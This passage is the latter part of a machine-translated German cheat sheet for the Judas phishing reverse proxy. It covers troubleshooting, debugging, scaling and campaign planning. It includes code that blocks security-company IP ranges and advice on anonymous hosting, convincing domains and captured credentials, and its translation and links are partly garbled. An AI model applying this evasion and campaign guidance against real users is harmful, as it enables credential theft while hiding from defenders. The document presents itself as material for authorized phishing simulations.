// Check for known security company IP ranges
clientIP := getClientIP(req)
if isSecurityCompanyIP(clientIP) \\\\{
return errors.New("blocked security company IP")
\\\\}
return nil
\\} ```_
Fehlerbehebung
Gemeinsame Themen
```bash
Port already in use
sudo netstat -tulpn|grep :8080 sudo kill -9 $(sudo lsof -t -i:8080)
SSL certificate issues
Check certificate validity
openssl x509 -in cert.pem -text -noout
Target website blocking proxy
Use different user agents
Implement request delays
Use proxy chains
Plugin compilation errors
go mod tidy go build -o plugin.so -buildmode=plugin plugin.go ```_
Debug Mode
```bash
Enable verbose logging
judas --target https://example.com --address localhost:8080 --verbose
Check Judas logs
tail -f judas.log
Test proxy functionality
curl -v http://localhost:8080
Verify SSL configuration
openssl s_client -connect localhost:443 ```_
Leistungsoptimierung
```bash
Optimize for high traffic
Increase file descriptor limits
ulimit -n 65536
Monitor resource usage
htop iotop netstat -tulpn
Use connection pooling
Implement caching
Scale horizontally with load balancer
```_
Best Practices
Kampagnenplanung
- Zielanalyse: Ziel-Website-Struktur und Verhalten verstehen
- *Infrastruktur-Setup: Verwenden Sie sicheres und anonymes Hosting
- Domain Auswahl: Wählen Sie überzeugende Domainnamen
- *SSL-Implementierung: Verwenden Sie legitime SSL-Zertifikate
- *Plugin-Entwicklung: Erstellen Sie benutzerdefinierte Plugins für spezifische Bedürfnisse
Rechtliche und ethische Überlegungen
```bash
Authorized testing only
Obtain proper written authorization
Follow responsible disclosure
Protect captured data
Document all activities
Data protection measures
Encrypt captured credentials
Secure data transmission
Implement data retention policies
Regular security audits
```_
Leistung und Skalierbarkeit
```bash
Optimize proxy performance
Use efficient plugins
Implement caching strategies
Monitor resource usage
Scale infrastructure as needed
Example load balancing setup
Use nginx or HAProxy
Distribute traffic across multiple Judas instances
Implement health checks
```_
Ressourcen
- [Judas GitHub Repository](__LINK_5___ -%20Go%20Programming%20Language
- Reverse Proxy Concepts
- [OWASP Phishing Guide](LINK_5 -%20(__LINK_5___)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Judas Phishing Proxy. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Phishing-Simulationen oder Penetrationstests durchführen. *